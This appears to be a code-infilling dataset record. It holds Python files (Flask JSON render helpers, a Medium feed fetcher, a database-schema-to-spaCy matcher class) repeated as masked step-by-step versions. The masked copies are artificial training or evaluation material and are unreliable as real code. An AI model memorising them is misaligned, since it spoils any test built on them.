'Development Status :: 4 - Beta',\n 'Environment :: Other Environment',\n 'Intended Audience :: Developers',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.2',\n 'Programming Language :: Python :: 3.3',\n 'Programming Language :: Python :: 3.4',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License',\n ],\n entry_points = \"\"\"\n [console_scripts]\n docker-zabbix-script-sender = docker_zabbix_script_sender.zabbix_sender:run\n \"\"\"\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import json
from flask import jsonify
from flask import make_response
from MultipleInterfaceManager.settings import STATUS_CODE
def _render(resp):
response = make_response(jsonify(resp))
# response.headers["Access-Control-Allow-Origin"] = "*"
return response
def json_list_render(code, data, limit, offset, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
limit = limit,
offset = offset,
message = message,
data = data
)
return _render(resp)
def json_detail_render(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
message = message,
data = data
)
return _render(resp)
def json_token_render(code, token, message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(
code = code,
token = token,
message = message
)
return _render(resp)
def json_detail_render_sse(code, data = [], message = None):
if message is None:
message = STATUS_CODE.get(code)
resp = dict(code=code, message=message, data=data)
return json.dumps(resp)
|
normal
|
{
"blob_id": "a87ab07bb1502a75a7e705cd5c92db829ebdd966",
"index": 8689,
"step-1": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\n<mask token>\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-4": "import json\nfrom flask import jsonify\nfrom flask import make_response\nfrom MultipleInterfaceManager.settings import STATUS_CODE\n\n\ndef _render(resp):\n response = make_response(jsonify(resp))\n return response\n\n\ndef json_list_render(code, data, limit, offset, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, limit=limit, offset=offset, message=message,\n data=data)\n return _render(resp)\n\n\ndef json_detail_render(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return _render(resp)\n\n\ndef json_token_render(code, token, message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, token=token, message=message)\n return _render(resp)\n\n\ndef json_detail_render_sse(code, data=[], message=None):\n if message is None:\n message = STATUS_CODE.get(code)\n resp = dict(code=code, message=message, data=data)\n return json.dumps(resp)\n",
"step-5": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport json\r\n\r\nfrom flask import jsonify\r\nfrom flask import make_response\r\nfrom MultipleInterfaceManager.settings import STATUS_CODE\r\n\r\n\r\ndef _render(resp):\r\n response = make_response(jsonify(resp))\r\n# response.headers[\"Access-Control-Allow-Origin\"] = \"*\"\r\n return response\r\n\r\n\r\n\r\ndef json_list_render(code, data, limit, offset, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n limit = limit,\r\n offset = offset,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\n\r\ndef json_detail_render(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n message = message,\r\n data = data\r\n )\r\n return _render(resp)\r\n\r\n\r\ndef json_token_render(code, token, message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(\r\n code = code,\r\n token = token,\r\n message = message\r\n )\r\n return _render(resp)\r\n\r\ndef json_detail_render_sse(code, data = [], message = None):\r\n if message is None:\r\n message = STATUS_CODE.get(code)\r\n resp = dict(code=code, message=message, data=data)\r\n return json.dumps(resp)\r\n",
"step-ids": [
2,
3,
5,
6,
7
]
}
|
[
2,
3,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main(app, data):
MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'
r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))
response_content = r.content.decode('utf-8')
json_data = response_content.lstrip('])}while(1);</x>')
return json.loads(json_data)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
import json
except ImportError:
import simplejson as json
def main(app, data):
MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'
r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))
response_content = r.content.decode('utf-8')
json_data = response_content.lstrip('])}while(1);</x>')
return json.loads(json_data)
<|reserved_special_token_1|>
from __future__ import unicode_literals
import requests
try:
import json
except ImportError:
import simplejson as json
def main(app, data):
MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'
r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))
response_content = r.content.decode('utf-8')
json_data = response_content.lstrip('])}while(1);</x>')
return json.loads(json_data)
|
flexible
|
{
"blob_id": "96936b7f6553bee06177eb66a2e63064c1bf51a6",
"index": 8373,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(app, data):\n MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'\n r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))\n response_content = r.content.decode('utf-8')\n json_data = response_content.lstrip('])}while(1);</x>')\n return json.loads(json_data)\n",
"step-3": "<mask token>\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\n\ndef main(app, data):\n MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'\n r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))\n response_content = r.content.decode('utf-8')\n json_data = response_content.lstrip('])}while(1);</x>')\n return json.loads(json_data)\n",
"step-4": "from __future__ import unicode_literals\nimport requests\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\n\ndef main(app, data):\n MEDIUM_API_ENDPOINT = 'https://medium.com/{0}/latest?format=json'\n r = requests.get(MEDIUM_API_ENDPOINT.format(data.get('username')))\n response_content = r.content.decode('utf-8')\n json_data = response_content.lstrip('])}while(1);</x>')\n return json.loads(json_data)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class DBModel(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DBModel(object):
<|reserved_special_token_0|>
def load_db_model(self):
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.
get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ''
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name ==
current_entity_name)
col_type = row.type_name
if col_type == 'varchar' or col_type == 'nvarchar':
col_type = 'string'
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.
refrenced_table, row.parent_table_col, row.
referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.
parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.
refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.
refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.
parent_table]))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]
) == 1:
current_entity = next(en for en in self.entities if en.name ==
row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = 'select distinct ' + entity_to_load['column'
] + ' from ' + entity_to_load['entity']
cursor.execute(entity_load_query)
entity_data = entity_to_load['entity'], []
for row in cursor:
entity_data[1].append(row[0])
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
for table_synonym in self.config.get_synonyms()['table']:
orginal_val = table_synonym['original']
synonyms_vals = table_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
for column_synonym in self.config.get_synonyms()['column']:
orginal_val = column_synonym['original']
synonyms_vals = column_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))
self.columns = [column for entity in self.entities for column in
entity.columns]
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DBModel(object):
<|reserved_special_token_0|>
def load_db_model(self):
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.
get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ''
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name ==
current_entity_name)
col_type = row.type_name
if col_type == 'varchar' or col_type == 'nvarchar':
col_type = 'string'
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.
refrenced_table, row.parent_table_col, row.
referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.
parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.
refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.
refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.
parent_table]))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]
) == 1:
current_entity = next(en for en in self.entities if en.name ==
row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = 'select distinct ' + entity_to_load['column'
] + ' from ' + entity_to_load['entity']
cursor.execute(entity_load_query)
entity_data = entity_to_load['entity'], []
for row in cursor:
entity_data[1].append(row[0])
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
for table_synonym in self.config.get_synonyms()['table']:
orginal_val = table_synonym['original']
synonyms_vals = table_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
for column_synonym in self.config.get_synonyms()['column']:
orginal_val = column_synonym['original']
synonyms_vals = column_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))
self.columns = [column for entity in self.entities for column in
entity.columns]
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
def get_custom_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', nlp(entity.name.
lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', nlp(column.
name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', nlp(synonym
.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_1|>
import pyodbc
from configuration.config import Configuration
from models.entities import Entities
from models.columns import Columns
from models.relationships import Relationship
from models.synonyms import Synonyms
from spacy.lemmatizer import Lemmatizer
from spacy.lookups import Lookups
class DBModel(object):
def __init__(self):
self.entities = []
self.columns = []
self.relationships = []
self.synonyms_col = []
self.synonyms_tab = []
self.entity_graph = []
self.loaded_entities = []
self.config = Configuration()
self.conn = pyodbc.connect(self.config.get_sql_connection_string())
lookups = Lookups()
self.lemmatizer = Lemmatizer(lookups)
self.load_db_model()
def load_db_model(self):
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.
get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ''
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name ==
current_entity_name)
col_type = row.type_name
if col_type == 'varchar' or col_type == 'nvarchar':
col_type = 'string'
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.
refrenced_table, row.parent_table_col, row.
referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.
parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.
refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.
refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[
0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.
parent_table]))
current_entity = None
current_entity_name = ''
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]
) == 1:
current_entity = next(en for en in self.entities if en.name ==
row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = 'select distinct ' + entity_to_load['column'
] + ' from ' + entity_to_load['entity']
cursor.execute(entity_load_query)
entity_data = entity_to_load['entity'], []
for row in cursor:
entity_data[1].append(row[0])
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
for table_synonym in self.config.get_synonyms()['table']:
orginal_val = table_synonym['original']
synonyms_vals = table_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
for column_synonym in self.config.get_synonyms()['column']:
orginal_val = column_synonym['original']
synonyms_vals = column_synonym['synonyms']
for synonyms_val in synonyms_vals:
self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))
self.columns = [column for entity in self.entities for column in
entity.columns]
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.
name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
column.name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', None, nlp(
synonym.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', None, nlp(
synonym.synonym.lower()))
return matcher
def get_custom_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + '_TABLE', nlp(entity.name.
lower()))
for column in entity.columns:
matcher.add(column.name.upper() + '_COLUMN', nlp(column.
name.lower()))
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + '_TABLE', nlp(synonym
.synonym.lower()))
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + '_COLUMN', nlp(
synonym.synonym.lower()))
return matcher
<|reserved_special_token_1|>
import pyodbc
from configuration.config import Configuration
from models.entities import Entities
from models.columns import Columns
from models.relationships import Relationship
from models.synonyms import Synonyms
from spacy.lemmatizer import Lemmatizer
from spacy.lookups import Lookups
class DBModel(object):
def __init__(self):
self.entities = []
self.columns = []
self.relationships = []
self.synonyms_col = []
self.synonyms_tab = []
self.entity_graph = []
self.loaded_entities = []
self.config = Configuration()
self.conn = pyodbc.connect(self.config.get_sql_connection_string())
lookups = Lookups()
self.lemmatizer = Lemmatizer(lookups)
self.load_db_model()
def load_db_model(self):
# loading the database from sql server
cursor = self.conn.cursor()
cursor.execute(self.config.get_tables_sql_query())
for row in cursor:
self.entities.append(Entities(row.table_name, self.config.get_default_column(row.table_name)))
cursor.execute(self.config.get_columns_sql_query())
current_entity = None
current_entity_name = ""
for row in cursor:
if current_entity_name != row.table_name:
current_entity_name = row.table_name
current_entity = next(en for en in self.entities if en.name == current_entity_name)
col_type = row.type_name
if col_type == "varchar" or col_type == "nvarchar":
col_type = "string"
current_entity.columns.append(Columns(row.column_name, col_type))
current_entity = None
current_entity_name = ""
cursor.execute(self.config.get_FK_sql_query())
for row in cursor:
self.relationships.append(Relationship(row.parent_table, row.refrenced_table, row.parent_table_col, row.referenced_table_col))
if len([en for en in self.entity_graph if en[0] == row.parent_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[0] == row.parent_table)
current_entity[1].append(row.refrenced_table)
else:
self.entity_graph.append((row.parent_table, [row.refrenced_table]))
if len([en for en in self.entity_graph if en[0] == row.refrenced_table]) > 0:
current_entity = next(en for en in self.entity_graph if en[0] == row.refrenced_table)
current_entity[1].append(row.parent_table)
else:
self.entity_graph.append((row.refrenced_table, [row.parent_table]))
current_entity = None
current_entity_name = ""
cursor.execute(self.config.get_PK_sql_query())
for row in cursor:
if len([en for en in self.entity_graph if en[0] == row.table_name]) == 1:
current_entity = next(en for en in self.entities if en.name == row.table_name)
current_entity.primaryKey = row.primary_key
for entity_to_load in self.config.get_entitites_to_load():
entity_load_query = "select distinct " + entity_to_load["column"] + " from " + entity_to_load["entity"]
cursor.execute(entity_load_query)
entity_data = (entity_to_load["entity"], [])
for row in cursor:
entity_data[1].append(row[0])
# add lemma strings
lemmas = self.lemmatizer(str(row[0]), u'NOUN')
for lemma in lemmas:
entity_data[1].append(str(lemma))
self.loaded_entities.append(entity_data)
# load synonyms from declarative file
# table sysnonyms
for table_synonym in self.config.get_synonyms()["table"]:
orginal_val = table_synonym["original"]
synonyms_vals = table_synonym["synonyms"]
for synonyms_val in synonyms_vals:
self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))
# column sysnonyms
for column_synonym in self.config.get_synonyms()["column"]:
orginal_val = column_synonym["original"]
synonyms_vals = column_synonym["synonyms"]
for synonyms_val in synonyms_vals:
self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))
# make a single array
self.columns = [column for entity in self.entities for column in entity.columns]
# might have to write a custom matcher TODO
# build the matcher based upon the original value and domain synonyms defined
def get_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + "_TABLE", None, nlp(entity.name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + "_COLUMN", None, nlp(column.name.lower()))
# add table synonyms to matcher
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + "_TABLE", None, nlp(synonym.synonym.lower()))
# add column synonyms to matcher
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + "_COLUMN", None, nlp(synonym.synonym.lower()))
return matcher
def get_custom_matcher(self, matcher, nlp):
for entity in self.entities:
matcher.add(entity.name.upper() + "_TABLE", nlp(entity.name.lower()))
for column in entity.columns:
matcher.add(column.name.upper() + "_COLUMN", nlp(column.name.lower()))
# add table synonyms to matcher
for synonym in self.synonyms_tab:
for entity in self.entities:
if synonym.column.lower() == entity.name.lower():
matcher.add(entity.name.upper() + "_TABLE", nlp(synonym.synonym.lower()))
# add column synonyms to matcher
for synonym in self.synonyms_col:
for column in self.columns:
if synonym.column.lower() == column.name.lower():
matcher.add(column.name.upper() + "_COLUMN", nlp(synonym.synonym.lower()))
return matcher
|
flexible
|
{
"blob_id": "76ebab93441676f9f00b2c2d63435e72c2d5d1ba",
"index": 9936,
"step-1": "<mask token>\n\n\nclass DBModel(object):\n <mask token>\n <mask token>\n\n def get_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.\n name.lower()))\n for column in entity.columns:\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n column.name.lower()))\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(\n synonym.synonym.lower()))\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n synonym.synonym.lower()))\n return matcher\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass DBModel(object):\n <mask token>\n\n def load_db_model(self):\n cursor = self.conn.cursor()\n cursor.execute(self.config.get_tables_sql_query())\n for row in cursor:\n self.entities.append(Entities(row.table_name, self.config.\n get_default_column(row.table_name)))\n cursor.execute(self.config.get_columns_sql_query())\n current_entity = None\n current_entity_name = ''\n for row in cursor:\n if current_entity_name != row.table_name:\n current_entity_name = row.table_name\n current_entity = next(en for en in self.entities if en.name ==\n current_entity_name)\n col_type = row.type_name\n if col_type == 'varchar' or col_type == 'nvarchar':\n col_type = 'string'\n current_entity.columns.append(Columns(row.column_name, col_type))\n current_entity = None\n current_entity_name = ''\n cursor.execute(self.config.get_FK_sql_query())\n for row in cursor:\n self.relationships.append(Relationship(row.parent_table, row.\n refrenced_table, row.parent_table_col, row.\n referenced_table_col))\n if len([en for en in self.entity_graph if en[0] == row.\n parent_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[\n 0] == row.parent_table)\n current_entity[1].append(row.refrenced_table)\n else:\n self.entity_graph.append((row.parent_table, [row.\n refrenced_table]))\n if len([en for en in self.entity_graph if en[0] == row.\n refrenced_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[\n 0] == row.refrenced_table)\n current_entity[1].append(row.parent_table)\n else:\n self.entity_graph.append((row.refrenced_table, [row.\n parent_table]))\n current_entity = None\n current_entity_name = ''\n cursor.execute(self.config.get_PK_sql_query())\n for row in cursor:\n if len([en for en in self.entity_graph if en[0] == row.table_name]\n ) == 1:\n current_entity = next(en for en in self.entities if en.name ==\n row.table_name)\n current_entity.primaryKey = row.primary_key\n for entity_to_load in self.config.get_entitites_to_load():\n entity_load_query = 'select distinct ' + entity_to_load['column'\n ] + ' from ' + entity_to_load['entity']\n cursor.execute(entity_load_query)\n entity_data = entity_to_load['entity'], []\n for row in cursor:\n entity_data[1].append(row[0])\n lemmas = self.lemmatizer(str(row[0]), u'NOUN')\n for lemma in lemmas:\n entity_data[1].append(str(lemma))\n self.loaded_entities.append(entity_data)\n for table_synonym in self.config.get_synonyms()['table']:\n orginal_val = table_synonym['original']\n synonyms_vals = table_synonym['synonyms']\n for synonyms_val in synonyms_vals:\n self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))\n for column_synonym in self.config.get_synonyms()['column']:\n orginal_val = column_synonym['original']\n synonyms_vals = column_synonym['synonyms']\n for synonyms_val in synonyms_vals:\n self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))\n self.columns = [column for entity in self.entities for column in\n entity.columns]\n\n def get_matcher(self, matcher, nlp):\n for entity in self.entities:\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(entity.\n name.lower()))\n for column in entity.columns:\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n column.name.lower()))\n for synonym in self.synonyms_tab:\n for entity in self.entities:\n if synonym.column.lower() == entity.name.lower():\n matcher.add(entity.name.upper() + '_TABLE', None, nlp(\n synonym.synonym.lower()))\n for synonym in self.synonyms_col:\n for column in self.columns:\n if synonym.column.lower() == column.name.lower():\n matcher.add(column.name.upper() + '_COLUMN', None, nlp(\n synonym.synonym.lower()))\n return matcher\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass DBModel(object):\n <mask token>\n\n def load_db_model(self):\n cursor = self.conn.cursor()\n cursor.execute(self.config.get_tables_sql_query())\n for row in cursor:\n self.entities.append(Entities(row.table_name, self.config.\n get_default_column(row.table_name)))\n cursor.execute(self.config.get_columns_sql_query())\n current_entity = None\n current_entity_name = ''\n for row in cursor:\n if current_entity_name != row.table_name:\n current_entity_name = row.table_name\n current_entity = next(en for en in self.entities if en.name ==\n current_entity_name)\n col_type = row.type_name\n if col_type == 'varchar' or col_type == 'nvarchar':\n col_type = 'string'\n current_entity.columns.append(Columns(row.column_name, col_type))\n current_entity = None\n current_entity_name = ''\n cursor.execute(self.config.get_FK_sql_query())\n for row in cursor:\n self.relationships.append(Relationship(row.parent_table, row.\n refrenced_table, row.parent_table_col, row.\n referenced_table_col))\n if len([en for en in self.entity_graph if en[0] == row.\n parent_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[\n 0] == row.parent_table)\n current_entity[1].append(row.refrenced_table)\n else:\n self.entity_graph.append((row.parent_table, [row.\n refrenced_table]))\n if len([en for en in self.entity_graph if en[0] == row.\n refrenced_table]) > 0:\n current_entity = next(en for en in self.entity_graph if en[\n 0] == row.refrenced_table)\n current_entity[1].append(row.parent_table)\n else:\n self.entity_graph.append((row.refrenced_table, [row.\n parent_table]))\n current_entity = None\n current_entity_name = ''\n cursor.execute(self.config.get_PK_sql_query())\n for row in cursor:\n if len([en for en in self.entity_graph if en[0] == row.table_name]\n ) == 1:\n current_entity = next(en for en in self.entities if en.name ==\n row.table_name)\n current_entity.primaryKey = row.primary_key\n for entity_to_load in self.config.get_entitites_to_load():\n entity_load_query = 'select distinct ' + entity_to_load['column'\n ] + ' from ' + entity_to_load['entity']\n cursor.execute(entity_load_query)\n entity_data = entity_to_load['entity'], []\n for row in cursor:\n entity_data[1].append(row[0])\n lemmas = self.lemmatizer(str(row[0]), u'NOUN')\n for lemma in lemmas:\n entity_data[1].append(str(lemma))\n self.loaded_entities.append(entity_data)\n for table_synonym in self.config.get_synonyms()['table']:\n orginal_val = table_synonym['original']\n synonyms_vals = table_synonym['synonyms']\n for synonyms_val in synonyms_vals:\n self.synonyms_tab.append(Synonyms(orginal_val, synonyms_val))\n for column_synonym in self.config.get_synonyms()['column']:\n orginal_val = column_synonym['original']\n synonyms_vals = column_synonym['synonyms']\n for synonyms_val in synonyms_vals:\n self.synonyms_col.append(Synonyms(orginal_val, synonyms_val))\n 